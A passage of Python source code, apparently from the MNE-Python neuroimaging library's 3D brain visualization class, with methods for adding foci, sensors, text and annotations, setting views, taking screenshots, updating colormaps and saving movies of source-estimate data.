self._renderer.plotter.add_legend( list(zip(labels, colors)), **legend) self._renderer._update() def remove_volume_labels(self): """Remove the volume labels from the rendered scene.""" self._remove('volume_labels', render=True) self._renderer.plotter.remove_legend() @fill_doc def add_foci(self, coords, coords_as_verts=False, map_surface=None, scale_factor=1, color="white", alpha=1, name=None, hemi=None, resolution=50): """Add spherical foci, possibly mapping to displayed surf. The foci spheres can be displayed at the coordinates given, or mapped through a surface geometry. In other words, coordinates from a volume-based analysis in MNI space can be displayed on an inflated average surface by finding the closest vertex on the white surface and mapping to that vertex on the inflated mesh. Parameters ---------- coords : ndarray, shape (n_coords, 3) Coordinates in stereotaxic space (default) or array of vertex ids (with ``coord_as_verts=True``). coords_as_verts : bool Whether the coords parameter should be interpreted as vertex ids. map_surface : str | None Surface to project the coordinates to, or None to use raw coords. When set to a surface, each foci is positioned at the closest vertex in the mesh. 
scale_factor : float Controls the size of the foci spheres (relative to 1cm). %(color_matplotlib)s %(alpha)s Default is 1. name : str Internal name to use. hemi : str | None If None, it is assumed to belong to the hemipshere being shown. If two hemispheres are being shown, an error will be thrown. resolution : int The resolution of the spheres. """ hemi = self._check_hemi(hemi, extras=['vol']) # Figure out how to interpret the first parameter if coords_as_verts: coords = self.geo[hemi].coords[coords] map_surface = None # Possibly map the foci coords through a surface if map_surface is not None: from scipy.spatial.distance import cdist foci_surf = _Surface(self._subject_id, hemi, map_surface, self._subjects_dir, offset=0, units=self._units, x_dir=self._rigid[0, :3]) foci_surf.load_geometry() foci_vtxs = np.argmin(cdist(foci_surf.coords, coords), axis=0) coords = self.geo[hemi].coords[foci_vtxs] # Convert the color code color = _to_rgb(color) if self._units == 'm': scale_factor = scale_factor / 1000. for _, _, v in self._iter_views(hemi): self._renderer.sphere(center=coords, color=color, scale=(10. * scale_factor), opacity=alpha, resolution=resolution) self._renderer.set_camera(**views_dicts[hemi][v]) # Store the foci in the Brain._data dictionary data_foci = coords if 'foci' in self._data.get(hemi, []): data_foci = np.vstack((self._data[hemi]['foci'], data_foci)) self._data[hemi] = self._data.get(hemi, dict()) # no data added yet self._data[hemi]['foci'] = data_foci @verbose def add_sensors(self, info, trans, meg=None, eeg='original', fnirs=True, ecog=True, seeg=True, dbs=True, verbose=None): """Add mesh objects to represent sensor positions. Parameters ---------- %(info_not_none)s %(trans_not_none)s %(meg)s %(eeg)s %(fnirs)s %(ecog)s %(seeg)s %(dbs)s %(verbose)s Notes ----- .. versionadded:: 0.24 """ _validate_type(info, Info, 'info') meg, eeg, fnirs, warn_meg = _handle_sensor_types(meg, eeg, fnirs) picks = pick_types(info, meg=('sensors' in meg), ref_meg=('ref' in meg), eeg=(len(eeg) > 0), ecog=ecog, seeg=seeg, dbs=dbs, fnirs=(len(fnirs) > 0)) head_mri_t = _get_trans(trans, 'head', 'mri', allow_none=False)[0] del trans # get transforms to "mri"window to_cf_t = _get_transforms_to_coord_frame( info, head_mri_t, coord_frame='mri') if pick_types(info, eeg=True, exclude=()).size > 0 and \ 'projected' in eeg: head_surf = _get_head_surface( 'seghead', self._subject_id, self._subjects_dir) else: head_surf = None # Do the main plotting for _ in self._iter_views('vol'): if picks.size > 0: sensors_actors = _plot_sensors( self._renderer, info, to_cf_t, picks, meg, eeg, fnirs, warn_meg, head_surf, self._units) for item, actors in sensors_actors.items(): for actor in actors: self._add_actor(item, actor) if 'helmet' in meg and pick_types(info, meg=True).size > 0: surf = get_meg_helmet_surf(info, head_mri_t) verts = surf['rr'] * (1 if self._units == 'm' else 1e3) actor, _ = self._renderer.mesh( *verts.T, surf['tris'], color=DEFAULTS['coreg']['helmet_color'], opacity=0.25, reset_camera=False, render=False) self._add_actor('helmet', actor) self._renderer._update() def remove_sensors(self, kind=None): """Remove sensors from the rendered scene. Parameters ---------- kind : str | list | None If None, removes all sensor-related data including the helmet. Can be "meg", "eeg", "fnirs", "ecog", "seeg", "dbs" or "helmet" to remove that item. 
""" all_kinds = ('meg', 'eeg', 'fnirs', 'ecog', 'seeg', 'dbs', 'helmet') if kind is None: for item in all_kinds: self._remove(item, render=False) else: if isinstance(kind, str): kind = [kind] for this_kind in kind: _check_option('kind', this_kind, all_kinds) self._remove(this_kind, render=False) self._renderer._update() def add_text(self, x, y, text, name=None, color=None, opacity=1.0, row=0, col=0, font_size=None, justification=None): """Add a text to the visualization. Parameters ---------- x : float X coordinate. y : float Y coordinate. text : str Text to add. name : str Name of the text (text label can be updated using update_text()). color : tuple Color of the text. Default is the foreground color set during initialization (default is black or white depending on the background color). opacity : float Opacity of the text (default 1.0). row : int | None Row index of which brain to use. Default is the top row. col : int | None Column index of which brain to use. Default is the left-most column. font_size : float | None The font size to use. justification : str | None The text justification. """ _validate_type(name, (str, None), 'name') name = text if name is None else name if 'text' in self._actors and name in self._actors['text']: raise ValueError(f'Text with the name {name} already exists') for ri, ci, _ in self._iter_views('vol'): if (row is None or row == ri) and (col is None or col == ci): actor = self._renderer.text2d( x_window=x, y_window=y, text=text, color=color, size=font_size, justification=justification) if 'text' not in self._actors: self._actors['text'] = dict() self._actors['text'][name] = actor def remove_text(self, name=None): """Remove text from the rendered scene. Parameters ---------- name : str | None Remove specific text by name. If None, all text will be removed. """ _validate_type(name, (str, None), 'name') if name is None: for actor in self._actors['text'].values(): self._renderer.plotter.remove_actor(actor) self._actors.pop('text') else: names = [None] if 'text' in self._actors: names += list(self._actors['text'].keys()) _check_option('name', name, names) self._renderer.plotter.remove_actor( self._actors['text'][name]) self._actors['text'].pop(name) self._renderer._update() def _configure_label_time_course(self): from ...label import read_labels_from_annot if not self.show_traces: return if self.mpl_canvas is None: self._configure_mplcanvas() else: self.clear_glyphs() self.traces_mode = 'label' self.add_annotation(self.annot, color="w", alpha=0.75) # now plot the time line self.plot_time_line(update=False) self.mpl_canvas.update_plot() for hemi in self._hemis: labels = read_labels_from_annot( subject=self._subject_id, parc=self.annot, hemi=hemi, subjects_dir=self._subjects_dir ) self._vertex_to_label_id[hemi] = np.full( self.geo[hemi].coords.shape[0], -1) self._annotation_labels[hemi] = labels for idx, label in enumerate(labels): self._vertex_to_label_id[hemi][label.vertices] = idx @fill_doc def add_annotation(self, annot, borders=True, alpha=1, hemi=None, remove_existing=True, color=None): """Add an annotation file. Parameters ---------- annot : str | tuple Either path to annotation file or annotation name. Alternatively, the annotation can be specified as a ``(labels, ctab)`` tuple per hemisphere, i.e. ``annot=(labels, ctab)`` for a single hemisphere or ``annot=((lh_labels, lh_ctab), (rh_labels, rh_ctab))`` for both hemispheres. ``labels`` and ``ctab`` should be arrays as returned by :func:`nibabel.freesurfer.io.read_annot`. 
borders : bool | int Show only label borders. If int, specify the number of steps (away from the true border) along the cortical mesh to include as part of the border definition. %(alpha)s Default is 1. hemi : str | None If None, it is assumed to belong to the hemipshere being shown. If two hemispheres are being shown, data must exist for both hemispheres. remove_existing : bool If True (default), remove old annotations. color : matplotlib-style color code If used, show all annotations in the same (specified) color. Probably useful only when showing annotation borders. """ from ...label import _read_annot hemis = self._check_hemis(hemi) # Figure out where the data is coming from if isinstance(annot, str): if os.path.isfile(annot): filepath = annot path = os.path.split(filepath)[0] file_hemi, annot = os.path.basename(filepath).split('.')[:2] if len(hemis) > 1: if annot[:2] == 'lh.': filepaths = [filepath, op.join(path, 'rh' + annot[2:])] elif annot[:2] == 'rh.': filepaths = [op.join(path, 'lh' + annot[2:], filepath)] else: raise RuntimeError('To add both hemispheres ' 'simultaneously, filename must ' 'begin with "lh." or "rh."') else: filepaths = [filepath] else: filepaths = [] for hemi in hemis: filepath = op.join(self._subjects_dir, self._subject_id, 'label', ".".join([hemi, annot, 'annot'])) if not os.path.exists(filepath): raise ValueError('Annotation file %s does not exist' % filepath) filepaths += [filepath] annots = [] for hemi, filepath in zip(hemis, filepaths): # Read in the data labels, cmap, _ = _read_annot(filepath) annots.append((labels, cmap)) else: annots = [annot] if len(hemis) == 1 else annot annot = 'annotation' for hemi, (labels, cmap) in zip(hemis, annots): # Maybe zero-out the non-border vertices self._to_borders(labels, hemi, borders) # Handle null labels properly cmap[:, 3] = 255 bgcolor = np.round(np.array(self._brain_color) * 255).astype(int) bgcolor[-1] = 0 cmap[cmap[:, 4] < 0, 4] += 2 ** 24 # wrap to positive cmap[cmap[:, 4] <= 0, :4] = bgcolor if np.any(labels == 0) and not np.any(cmap[:, -1] <= 0): cmap = np.vstack((cmap, np.concatenate([bgcolor, [0]]))) # Set label ids sensibly order = np.argsort(cmap[:, -1]) cmap = cmap[order] ids = np.searchsorted(cmap[:, -1], labels) cmap = cmap[:, :4] # Set the alpha level alpha_vec = cmap[:, 3] alpha_vec[alpha_vec > 0] = alpha * 255 # Override the cmap when a single color is used if color is not None: rgb = np.round(np.multiply(_to_rgb(color), 255)) cmap[:, :3] = rgb.astype(cmap.dtype) ctable = cmap.astype(np.float64) for _ in self._iter_views(hemi): mesh = self._layered_meshes[hemi] mesh.add_overlay( scalars=ids, colormap=ctable, rng=[np.min(ids), np.max(ids)], opacity=alpha, name=annot, ) self._annots[hemi].append(annot) if not self.time_viewer or self.traces_mode == 'vertex': self._renderer._set_colormap_range( mesh._actor, cmap.astype(np.uint8), None) self._renderer._update() def close(self): """Close all figures and cleanup data structure.""" self._closed = True self._renderer.close() def show(self): """Display the window.""" from ..backends._utils import _qt_app_exec self._renderer.show() if self._block: _qt_app_exec(self._renderer.figure.store["app"]) @fill_doc def show_view(self, view=None, roll=None, distance=None, *, row=None, col=None, hemi=None, align=True, azimuth=None, elevation=None, focalpoint=None): """Orient camera to display view. Parameters ---------- %(view)s %(roll)s %(distance)s row : int | None The row to set. Default all rows. col : int | None The column to set. Default all columns. 
hemi : str | None Which hemi to use for view lookup (when in "both" mode). align : bool If True, consider view arguments relative to canonical MRI directions (closest to MNI for the subject) rather than native MRI space. This helps when MRIs are not in standard orientation (e.g., have large rotations). %(azimuth)s %(elevation)s %(focalpoint)s Notes ----- The builtin string views are the following perspectives, based on the :term:`RAS` convention. If not otherwise noted, the view will have the top of the brain (superior, +Z) in 3D space shown upward in the 2D perspective: ``'lateral'`` From the left or right side such that the lateral (outside) surface of the given hemisphere is visible. ``'medial'`` From the left or right side such that the medial (inside) surface of the given hemisphere is visible (at least when in split or single-hemi mode). ``'rostral'`` From the front. ``'caudal'`` From the rear. ``'dorsal'`` From above, with the front of the brain pointing up. ``'ventral'`` From below, with the front of the brain pointing up. ``'frontal'`` From the front and slightly lateral, with the brain slightly tilted forward (yielding a view from slightly above). ``'parietal'`` From the rear and slightly lateral, with the brain slightly tilted backward (yielding a view from slightly above). ``'axial'`` From above with the brain pointing up (same as ``'dorsal'``). ``'sagittal'`` From the right side. ``'coronal'`` From the rear. Three letter abbreviations (e.g., ``'lat'``) of all of the above are also supported. """ _validate_type(row, ('int-like', None), 'row') _validate_type(col, ('int-like', None), 'col') hemi = self._hemi if hemi is None else hemi if hemi == 'split': if (self._view_layout == 'vertical' and col == 1 or self._view_layout == 'horizontal' and row == 1): hemi = 'rh' else: hemi = 'lh' _validate_type(view, (str, None), 'view') view_params = dict(azimuth=azimuth, elevation=elevation, roll=roll, distance=distance, focalpoint=focalpoint) if view is not None: # view_params take precedence view_params = {param: val for param, val in view_params.items() if val is not None} # no overwriting with None view_params = dict(views_dicts[hemi].get(view), **view_params) xfm = self._rigid if align else None for h in self._hemis: for ri, ci, _ in self._iter_views(h): if (row is None or row == ri) and (col is None or col == ci): self._renderer.set_camera( **view_params, reset_camera=False, rigid=xfm) self._renderer._update() def reset_view(self): """Reset the camera.""" for h in self._hemis: for _, _, v in self._iter_views(h): self._renderer.set_camera(**views_dicts[h][v], reset_camera=False) def save_image(self, filename=None, mode='rgb'): """Save view from all panels to disk. Parameters ---------- filename : str Path to new image file. mode : str Either 'rgb' or 'rgba' for values to return. """ if filename is None: filename = _generate_default_filename(".png") _save_ndarray_img( filename, self.screenshot(mode=mode, time_viewer=True)) @fill_doc def screenshot(self, mode='rgb', time_viewer=False): """Generate a screenshot of current view. Parameters ---------- mode : str Either 'rgb' or 'rgba' for values to return. %(brain_screenshot_time_viewer)s Returns ------- screenshot : array Image pixel values. 
""" n_channels = 3 if mode == 'rgb' else 4 img = self._renderer.screenshot(mode) logger.debug(f'Got screenshot of size {img.shape}') if time_viewer and self.time_viewer and \ self.show_traces and \ not self.separate_canvas: from matplotlib.image import imread canvas = self.mpl_canvas.fig.canvas canvas.draw_idle() fig = self.mpl_canvas.fig with BytesIO() as output: # Need to pass dpi here so it uses the physical (HiDPI) DPI # rather than logical DPI when saving in most cases. # But when matplotlib uses HiDPI and VTK doesn't # (e.g., macOS w/Qt 5.14+ and VTK9) then things won't work, # so let's just calculate the DPI we need to get # the correct size output based on the widths being equal size_in = fig.get_size_inches() dpi = fig.get_dpi() want_size = tuple(x * dpi for x in size_in) n_pix = want_size[0] * want_size[1] logger.debug( f'Saving figure of size {size_in} @ {dpi} DPI ' f'({want_size} = {n_pix} pixels)') # Sometimes there can be off-by-one errors here (e.g., # if in mpl int() rather than int(round()) is used to # compute the number of pixels) so rather than use "raw" # format and try to reshape ourselves, just write to PNG # and read it, which has the dimensions encoded for us. fig.savefig(output, dpi=dpi, format='png', facecolor=self._bg_color, edgecolor='none') output.seek(0) trace_img = imread(output, format='png')[:, :, :n_channels] trace_img = np.clip( np.round(trace_img * 255), 0, 255).astype(np.uint8) bgcolor = np.array(self._brain_color[:n_channels]) / 255 img = concatenate_images([img, trace_img], bgcolor=bgcolor, n_channels=n_channels) return img @contextlib.contextmanager def _no_lut_update(self, why): orig = self._lut_locked self._lut_locked = why try: yield finally: self._lut_locked = orig @fill_doc def update_lut(self, fmin=None, fmid=None, fmax=None, alpha=None): """Update color map. 
Parameters ---------- %(fmin_fmid_fmax)s %(alpha)s """ args = f'{fmin}, {fmid}, {fmax}, {alpha}' if self._lut_locked is not None: logger.debug(f'LUT update postponed with {args}') return logger.debug(f'Updating LUT with {args}') center = self._data['center'] colormap = self._data['colormap'] transparent = self._data['transparent'] lims = {key: self._data[key] for key in ('fmin', 'fmid', 'fmax')} _update_monotonic(lims, fmin=fmin, fmid=fmid, fmax=fmax) assert all(val is not None for val in lims.values()) self._data.update(lims) self._data['ctable'] = np.round( calculate_lut(colormap, alpha=1., center=center, transparent=transparent, **lims) * 255).astype(np.uint8) # update our values rng = self._cmap_range ctable = self._data['ctable'] for hemi in ['lh', 'rh', 'vol']: hemi_data = self._data.get(hemi) if hemi_data is not None: if hemi in self._layered_meshes: mesh = self._layered_meshes[hemi] mesh.update_overlay(name='data', colormap=self._data['ctable'], opacity=alpha, rng=rng) self._renderer._set_colormap_range( mesh._actor, ctable, self._scalar_bar, rng, self._brain_color) grid_volume_pos = hemi_data.get('grid_volume_pos') grid_volume_neg = hemi_data.get('grid_volume_neg') for grid_volume in (grid_volume_pos, grid_volume_neg): if grid_volume is not None: self._renderer._set_volume_range( grid_volume, ctable, hemi_data['alpha'], self._scalar_bar, rng) glyph_actor = hemi_data.get('glyph_actor') if glyph_actor is not None: for glyph_actor_ in glyph_actor: self._renderer._set_colormap_range( glyph_actor_, ctable, self._scalar_bar, rng) if self.time_viewer: with self._no_lut_update(f'update_lut {args}'): for key in ('fmin', 'fmid', 'fmax'): self.callbacks[key](lims[key]) self._renderer._update() def set_data_smoothing(self, n_steps): """Set the number of smoothing steps. Parameters ---------- n_steps : int Number of smoothing steps. """ from ...morph import _hemi_morph for hemi in ['lh', 'rh']: hemi_data = self._data.get(hemi) if hemi_data is not None: if len(hemi_data['array']) >= self.geo[hemi].x.shape[0]: continue vertices = hemi_data['vertices'] if vertices is None: raise ValueError( 'len(data) < nvtx (%s < %s): the vertices ' 'parameter must not be None' % (len(hemi_data), self.geo[hemi].x.shape[0])) morph_n_steps = 'nearest' if n_steps == -1 else n_steps with use_log_level(False): smooth_mat = _hemi_morph( self.geo[hemi].orig_faces, np.arange(len(self.geo[hemi].coords)), vertices, morph_n_steps, maps=None, warn=False) self._data[hemi]['smooth_mat'] = smooth_mat self.set_time_point(self._data['time_idx']) self._data['smoothing_steps'] = n_steps @property def _n_times(self): return len(self._times) if self._times is not None else None @property def time_interpolation(self): """The interpolation mode.""" return self._time_interpolation @fill_doc def set_time_interpolation(self, interpolation): """Set the interpolation mode. 
Parameters ---------- %(brain_time_interpolation)s """ self._time_interpolation = _check_option( 'interpolation', interpolation, ('linear', 'nearest', 'zero', 'slinear', 'quadratic', 'cubic') ) self._time_interp_funcs = dict() self._time_interp_inv = None if self._times is not None: idx = np.arange(self._n_times) for hemi in ['lh', 'rh', 'vol']: hemi_data = self._data.get(hemi) if hemi_data is not None: array = hemi_data['array'] self._time_interp_funcs[hemi] = _safe_interp1d( idx, array, self._time_interpolation, axis=-1, assume_sorted=True) self._time_interp_inv = _safe_interp1d(idx, self._times) def set_time_point(self, time_idx): """Set the time point shown (can be a float to interpolate). Parameters ---------- time_idx : int | float The time index to use. Can be a float to use interpolation between indices. """ self._current_act_data = dict() time_actor = self._data.get('time_actor', None) time_label = self._data.get('time_label', None) for hemi in ['lh', 'rh', 'vol']: hemi_data = self._data.get(hemi) if hemi_data is not None: array = hemi_data['array'] # interpolate in time vectors = None if array.ndim == 1: act_data = array self._current_time = 0 else: act_data = self._time_interp_funcs[hemi](time_idx) self._current_time = self._time_interp_inv(time_idx) if array.ndim == 3: vectors = act_data act_data = np.linalg.norm(act_data, axis=1) self._current_time = self._time_interp_inv(time_idx) self._current_act_data[hemi] = act_data if time_actor is not None and time_label is not None: time_actor.SetInput(time_label(self._current_time)) # update the volume interpolation grid = hemi_data.get('grid') if grid is not None: vertices = self._data['vol']['vertices'] values = self._current_act_data['vol'] rng = self._cmap_range fill = 0 if self._data['center'] is not None else rng[0] _cell_data(grid)['values'].fill(fill) # XXX for sided data, we probably actually need two # volumes as composite/MIP needs to look at two # extremes... for now just use abs. Eventually we can add # two volumes if we want. _cell_data(grid)['values'][vertices] = values # interpolate in space smooth_mat = hemi_data.get('smooth_mat') if smooth_mat is not None: act_data = smooth_mat.dot(act_data) # update the mesh scalar values if hemi in self._layered_meshes: mesh = self._layered_meshes[hemi] if 'data' in mesh._overlays: mesh.update_overlay(name='data', scalars=act_data) else: mesh.add_overlay( scalars=act_data, colormap=self._data['ctable'], rng=self._cmap_range, opacity=None, name='data', ) # update the glyphs if vectors is not None: self._update_glyphs(hemi, vectors) self._data['time_idx'] = time_idx self._renderer._update() def set_time(self, time): """Set the time to display (in seconds). Parameters ---------- time : float The time to show, in seconds. 
""" if self._times is None: raise ValueError( 'Cannot set time when brain has no defined times.') elif min(self._times) <= time <= max(self._times): self.set_time_point(np.interp(float(time), self._times, np.arange(self._n_times))) else: raise ValueError( f'Requested time ({time} s) is outside the range of ' f'available times ({min(self._times)}-{max(self._times)} s).') def _update_glyphs(self, hemi, vectors): hemi_data = self._data.get(hemi) assert hemi_data is not None vertices = hemi_data['vertices'] vector_alpha = self._data['vector_alpha'] scale_factor = self._data['scale_factor'] vertices = slice(None) if vertices is None else vertices x, y, z = np.array(self.geo[hemi].coords)[vertices].T if hemi_data['glyph_actor'] is None: add = True hemi_data['glyph_actor'] = list() else: add = False count = 0 for _ in self._iter_views(hemi): if hemi_data['glyph_dataset'] is None: glyph_mapper, glyph_dataset = self._renderer.quiver3d( x, y, z, vectors[:, 0], vectors[:, 1], vectors[:, 2], color=None, mode='2darrow', scale_mode='vector', scale=scale_factor, opacity=vector_alpha, name=str(hemi) + "_glyph" ) hemi_data['glyph_dataset'] = glyph_dataset hemi_data['glyph_mapper'] = glyph_mapper else: glyph_dataset = hemi_data['glyph_dataset'] _point_data(glyph_dataset)['vec'] = vectors glyph_mapper = hemi_data['glyph_mapper'] if add: glyph_actor = self._renderer._actor(glyph_mapper) prop = glyph_actor.GetProperty() prop.SetLineWidth(2.) prop.SetOpacity(vector_alpha) self._renderer.plotter.add_actor(glyph_actor, render=False) hemi_data['glyph_actor'].append(glyph_actor) else: glyph_actor = hemi_data['glyph_actor'][count] count += 1 self._renderer._set_colormap_range( actor=glyph_actor, ctable=self._data['ctable'], scalar_bar=None, rng=self._cmap_range, ) @property def _cmap_range(self): dt_max = self._data['fmax'] if self._data['center'] is None: dt_min = self._data['fmin'] else: dt_min = -1 * dt_max rng = [dt_min, dt_max] return rng def _update_fscale(self, fscale): """Scale the colorbar points.""" fmin = self._data['fmin'] * fscale fmid = self._data['fmid'] * fscale fmax = self._data['fmax'] * fscale self.update_lut(fmin=fmin, fmid=fmid, fmax=fmax) def _update_auto_scaling(self, restore=False): user_clim = self._data['clim'] if user_clim is not None and 'lims' in user_clim: allow_pos_lims = False else: allow_pos_lims = True if user_clim is not None and restore: clim = user_clim else: clim = 'auto' colormap = self._data['colormap'] transparent = self._data['transparent'] mapdata = _process_clim( clim, colormap, transparent, np.concatenate(list(self._current_act_data.values())), allow_pos_lims) diverging = 'pos_lims' in mapdata['clim'] colormap = mapdata['colormap'] scale_pts = mapdata['clim']['pos_lims' if diverging else 'lims'] transparent = mapdata['transparent'] del mapdata fmin, fmid, fmax = scale_pts center = 0. 
if diverging else None self._data['center'] = center self._data['colormap'] = colormap self._data['transparent'] = transparent self.update_lut(fmin=fmin, fmid=fmid, fmax=fmax) def _to_time_index(self, value): """Return the interpolated time index of the given time value.""" time = self._data['time'] value = np.interp(value, time, np.arange(len(time))) return value @property def data(self): """Data used by time viewer and color bar widgets.""" return self._data @property def labels(self): return self._labels @property def views(self): return self._views @property def hemis(self): return self._hemis def _save_movie(self, filename, time_dilation=4., tmin=None, tmax=None, framerate=24, interpolation=None, codec=None, bitrate=None, callback=None, time_viewer=False, **kwargs): import imageio with self._renderer._disabled_interaction(): images = self._make_movie_frames( time_dilation, tmin, tmax, framerate, interpolation, callback, time_viewer) # find imageio FFMPEG parameters if 'fps' not in kwargs: kwargs['fps'] = framerate if codec is not None: kwargs['codec'] = codec if bitrate is not None: kwargs['bitrate'] = bitrate imageio.mimwrite(filename, images, **kwargs) def _save_movie_tv(self, filename, time_dilation=4., tmin=None, tmax=None, framerate=24, interpolation=None, codec=None, bitrate=None, callback=None, time_viewer=False, **kwargs): def frame_callback(frame, n_frames): if frame == n_frames: # On the ImageIO step self.status_msg.set_value( "Saving with ImageIO: %s" % filename ) self.status_msg.show() self.status_progress.hide() self._renderer._status_bar_update() else: self.status_msg.set_value( "Rendering images (frame %d / %d) ..." % (frame + 1, n_frames) ) self.status_msg.show() self.status_progress.show() self.status_progress.set_range([0, n_frames - 1]) self.status_progress.set_value(frame) self.status_progress.update() self.status_msg.update() self._renderer._status_bar_update() # set cursor to busy default_cursor = self._renderer._window_get_cursor() self._renderer._window_set_cursor( self._renderer._window_new_cursor("WaitCursor")) try: self._save_movie(filename, time_dilation, tmin, tmax, framerate, interpolation, codec, bitrate, frame_callback, time_viewer, **kwargs) except (Exception, KeyboardInterrupt): warn('Movie saving aborted:\n' + traceback.format_exc()) finally: self._renderer._window_set_cursor(default_cursor) @fill_doc def save_movie(self, filename=None, time_dilation=4., tmin=None, tmax=None, framerate=24, interpolation=None, codec=None, bitrate=None, callback=None, time_viewer=False, **kwargs): """Save a movie (for data with a time axis). The movie is created through the :mod:`imageio` module. The format is determined by the extension, and additional options can be specified through keyword arguments that depend on the format, see :doc:`imageio's format page <imageio:formats/index>`. .. Warning:: This method assumes that time is specified in seconds when adding data. If time is specified in milliseconds this will result in movies 1000 times longer than expected. Parameters ---------- filename : str Path at which to save the movie. The extension determines the format (e.g., ``'*.mov'``, ``'*.gif'``, ...; see the :mod:`imageio` documentation for available formats). time_dilation : float Factor by which to stretch time (default 4). For example, an epoch from -100 to 600 ms lasts 700 ms. With ``time_dilation=4`` this would result in a 2.8 s long movie. tmin : float First time point to include (default: all data). 
tmax : float Last time point to include (default: all data). framerate : float Framerate of the movie (frames per second, default 24). %(brain_time_interpolation)s If None, it uses the current ``brain.interpolation``, which defaults to ``'nearest'``. Defaults to None. codec : str | None The codec to use. bitrate : float | None The bitrate to use. callback : callable | None A function to call on each iteration. Useful for status message updates. It will be passed keyword arguments ``frame`` and ``n_frames``. %(brain_screenshot_time_viewer)s **kwargs : dict Specify additional options for :mod:`imageio`. """ if filename is None: filename = _generate_default_filename(".mp4") func = self._save_movie_tv if self.time_viewer else self._save_movie func(filename, time_dilation, tmin, tmax, framerate, interpolation, codec, bitrate, callback, time_viewer, **kwargs) def _make_movie_frames(self, time_dilation, tmin, tmax, framerate, interpolation, callback, time_viewer): from math import floor # find tmin if tmin is None: tmin = self._times[0] elif tmin < self._times[0]: raise ValueError("tmin=%r is smaller than the first time point " "(%r)" % (tmin, self._times[0])) # find indexes at which to create frames if tmax is None: tmax = self._times[-1] elif tmax > self._times[-1]: raise ValueError("tmax=%r is greater than the latest time point " "(%r)" % (tmax, self._times[-1])) n_frames = floor((tmax - tmin) * time_dilation * framerate) times = np.arange(n_frames, dtype=float) times /= framerate * time_dilation times += tmin time_idx = np.interp(times, self._times, np.arange(self._n_times)) n_times = len(time_idx) if n_times == 0: raise ValueError("No time points selected") logger.debug("Save movie for time points/samples\n%s\n%s" % (times, time_idx)) # Sometimes the first screenshot is rendered with a different # resolution on OS X self.screenshot(time_viewer=time_viewer) old_mode = self.time_interpolation if interpolation is not None: self.set_time_interpolation(interpolation) try: images = [ self.screenshot(time_viewer=time_viewer) for _ in self._iter_time(time_idx, callback)] finally: self.set_time_interpolation(old_mode) if callback is not None: callback(frame=len(time_idx), n_frames=len(time_idx)) return images def _iter_time(self, time_idx, callback): """Iterate through time points, then reset to current time. Parameters ---------- time_idx : array_like Time point indexes through which to iterate. callback : callable | None Callback to call before yielding each frame. Yields ------ idx : int | float Current index. Notes ----- Used by movie and image sequence saving functions. 
""" if self.time_viewer: func = partial(self.callbacks["time"], update_widget=True) else: func = self.set_time_point current_time_idx = self._data["time_idx"] for ii, idx in enumerate(time_idx): func(idx) if callback is not None: callback(frame=ii, n_frames=len(time_idx)) yield idx # Restore original time index func(current_time_idx) def _check_stc(self, hemi, array, vertices): from ...source_estimate import ( _BaseSourceEstimate, _BaseSurfaceSourceEstimate, _BaseMixedSourceEstimate, _BaseVolSourceEstimate ) if isinstance(array, _BaseSourceEstimate): stc = array stc_surf = stc_vol = None if isinstance(stc, _BaseSurfaceSourceEstimate): stc_surf = stc elif isinstance(stc, _BaseMixedSourceEstimate): stc_surf = stc.surface() if hemi != 'vol' else None stc_vol = stc.volume() if hemi == 'vol' else None elif isinstance(stc, _BaseVolSourceEstimate): stc_vol = stc if hemi == 'vol' else None else: raise TypeError("stc not supported") if stc_surf is None and stc_vol is None: raise ValueError("No data to be added") if stc_surf is not None: array = getattr(stc_surf, hemi + '_data') vertices = stc_surf.vertices[0 if hemi == 'lh' else 1] if stc_vol is not None: array = stc_vol.data vertices = np.concatenate(stc_vol.vertices) else: stc = None return stc, array, vertices def _check_hemi(self, hemi, extras=()): """Check for safe single-hemi input, returns str.""" _validate_type(hemi, (None, str), 'hemi') if hemi is None: if self._hemi not in ['lh', 'rh']: raise ValueError('hemi must not be None when both ' 'hemispheres are displayed') hemi = self._hemi _check_option('hemi', hemi, ('lh', 'rh') + tuple(extras)) return hemi def _check_hemis(self, hemi): """Check for safe dual or single-hemi input, returns list.""" if hemi is None: if self._hemi not in ['lh', 'rh']: hemi = ['lh', 'rh'] else: hemi = [self._hemi] elif hemi not in ['lh', 'rh']: extra = ' or None' if self._hemi in ['lh', 'rh'] else '' raise ValueError('hemi must be either "lh" or "rh"' + extra) else: hemi = [hemi] return hemi def _to_borders(self, label, hemi, borders, restrict_idx=None): """Convert a label/parc to borders.""" if not isinstance(borders, (bool, int)) or borders < 0: raise ValueError('borders must be a bool or positive integer') if borders: n_vertices = label.size edges = mesh_edges(self.geo[hemi].orig_faces) edges = edges.tocoo() border_edges = label[edges.row] != label[edges.col] show = np.zeros(n_vertices, dtype=np.int64) keep_idx = np.unique(edges.row[border_edges]) if isinstance(borders, int): for _ in range(borders): keep_idx = np.in1d( self.geo[hemi].orig_faces.ravel(), keep_idx) keep_idx.shape = self.geo[hemi].orig_faces.shape keep_idx = self.geo[hemi].orig_faces[ np.any(keep_idx, axis=1)] keep_idx = np.unique(keep_idx) if restrict_idx is not None: keep_idx = keep_idx[np.in1d(keep_idx, restrict_idx)] show[keep_idx] = 1 label *= show @deprecated('enable_depth_peeling is deprecated and will be ' 'removed in 1.1') def enable_depth_peeling(self): """Enable depth peeling. """ self._renderer._enable_depth_peeling() def get_picked_points(self): """Return the vertices of the picked points. Returns ------- points : list of int | None The vertices picked by the time viewer. 
""" if hasattr(self, "time_viewer"): return self.picked_points def __hash__(self): """Hash the object.""" raise NotImplementedError def _safe_interp1d(x, y, kind='linear', axis=-1, assume_sorted=False): """Work around interp1d not liking singleton dimensions.""" from scipy.interpolate import interp1d if y.shape[axis] == 1: def func(x): return np.take(y, np.zeros(np.asarray(x).shape, int), axis=axis) return func else: return interp1d(x, y, kind, axis=axis, assume_sorted=assume_sorted) def _update_limits(fmin, fmid, fmax, center, array): if center is None: if fmin is None: fmin = array.min() if array.size > 0 else 0 if fmax is None: fmax = array.max() if array.size > 0 else 1 else: if fmin is None: fmin = 0 if fmax is None: fmax = np.abs(center - array).max() if array.size > 0 else 1 if fmid is None: fmid = (fmin + fmax) / 2. if fmin >= fmid: raise RuntimeError('min must be < mid, got %0.4g >= %0.4g' % (fmin, fmid)) if fmid >= fmax: raise RuntimeError('mid must be < max, got %0.4g >= %0.4g' % (fmid, fmax)) return fmin, fmid, fmax def _update_monotonic(lims, fmin, fmid, fmax): if fmin is not None: lims['fmin'] = fmin if lims['fmax'] < fmin: logger.debug(f' Bumping fmax = {lims["fmax"]} to {fmin}') lims['fmax'] = fmin if lims['fmid'] < fmin: logger.debug(f' Bumping fmid = {lims["fmid"]} to {fmin}') lims['fmid'] = fmin 